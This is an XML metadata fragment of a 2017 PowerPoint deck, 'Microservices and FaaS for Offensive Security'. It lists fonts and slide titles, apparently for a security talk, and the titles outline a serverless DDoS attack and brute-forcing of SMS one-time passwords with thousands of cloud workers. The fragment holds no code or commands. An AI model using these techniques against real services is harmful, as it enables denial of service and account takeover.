        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16269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29543</TotalTime>
  <Words>3678</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>759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Courier New</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Proxima Nova</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>spearmint</vt:lpstr>
      <vt:lpstr>Microservices and FaaS for Offensive Security</vt:lpstr>
      <vt:lpstr>$ whoami</vt:lpstr>
      <vt:lpstr>AWS Lambda</vt:lpstr>
      <vt:lpstr>Servers are dead...</vt:lpstr>
      <vt:lpstr>The stack</vt:lpstr>
      <vt:lpstr>Real-time File Processing</vt:lpstr>
      <vt:lpstr>Scale</vt:lpstr>
      <vt:lpstr>Automate</vt:lpstr>
      <vt:lpstr>AWS WAF Automation</vt:lpstr>
      <vt:lpstr>Hello World from the Serverless cloud</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hello World on AWS Lambda (1/4)</vt:lpstr>
      <vt:lpstr>Hello World on AWS Lambda (2/4)</vt:lpstr>
      <vt:lpstr>Hello World on AWS Lambda (3/4)</vt:lpstr>
      <vt:lpstr>Hello World on AWS Lambda (4/4)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hello World on Play with Docker</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cost</vt:lpstr>
      <vt:lpstr>FaaS support by region</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Advantages</vt:lpstr>
      <vt:lpstr>Project Thunderstruck  Finding use cases for FaaS in offensive security</vt:lpstr>
      <vt:lpstr>Project Thunderstruck</vt:lpstr>
      <vt:lpstr>DDoS without Servers</vt:lpstr>
      <vt:lpstr>1: DDoS without Servers</vt:lpstr>
      <vt:lpstr>Script Kiddie skills</vt:lpstr>
      <vt:lpstr>The attack</vt:lpstr>
      <vt:lpstr>Python</vt:lpstr>
      <vt:lpstr>Monitor the target</vt:lpstr>
      <vt:lpstr>Monitor the target</vt:lpstr>
      <vt:lpstr>The Results</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>SMS OTP Brute force</vt:lpstr>
      <vt:lpstr>2: SMS OTP</vt:lpstr>
      <vt:lpstr>Transaction Flow</vt:lpstr>
      <vt:lpstr>The Plan</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Google App Engine (1/2)</vt:lpstr>
      <vt:lpstr>Google App Engine (2/2)</vt:lpstr>
      <vt:lpstr>Function</vt:lpstr>
      <vt:lpstr>Testing</vt:lpstr>
      <vt:lpstr>Brute-force 4 digits - 100 workers (100/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 4 digits - 200 workers (50/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 4 digits - 400 workers (25/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 5 digits - 1,000 workers (100/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 5 digits - 2,000 workers (50/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 5 digits - 4,000 workers (25/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 6 digits - 10,000 workers (100/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 6 digits - 10,000 workers (100/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 6 digits - 20,000 workers (50/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 6 digits - 40,000 workers (25/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 6 digits - 20,000 workers (50/worker)</vt:lpstr>
      <vt:lpstr>Brute-force 6 digits - 40,000 workers (25/worker)</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>6 digit OTP</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Further work</vt:lpstr>
      <vt:lpstr>Interesting talks</vt:lpstr>
      <vt:lpstr>Going further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and FaaS for Offensive Security</dc:title>
  <dc:creator>ryan</dc:creator>
  <cp:lastModifiedBy>Ryan Baxendale</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-27T04:06:51Z</dcterms:modified>
</cp:coreProperties>
</file>